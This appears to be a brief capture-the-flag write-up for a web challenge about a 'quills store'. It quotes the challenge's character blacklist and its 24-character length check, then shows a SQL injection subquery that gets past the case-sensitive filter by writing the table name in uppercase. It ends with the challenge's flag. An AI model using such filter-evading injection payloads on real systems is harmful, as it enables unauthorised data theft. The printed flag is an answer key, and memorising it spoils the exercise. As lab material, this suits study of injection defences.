Rating: 5.0
A little bird told me my original quills store was vulnerable to illegal hacking! I've fixed my store now though, and now it should be impossible to hack!
For the pre analysis check this
Compared to the other level we find two differences
The word flag is in the blacklist
blacklist = ["-", "/", ";", "'", "\"", "flag"]
The query we need to inject must not exceed 24 characters
if cols.length > 24 || !/^[0-9]+$/.match?(lim) || !/^[0-9]+$/.match?(off)
return "bad, no quills for you!"
end
For the first requirement we can use the world FLAGTABLE because the program does not filter uppercase characters, while for the second requirement we can write the query in this way
(SELECT* FROM FLAGTABLE)
actf{the_time_we_have_spent_together_riding_through_this_english_denylist_c0776ee734497ca81cbd55ea}
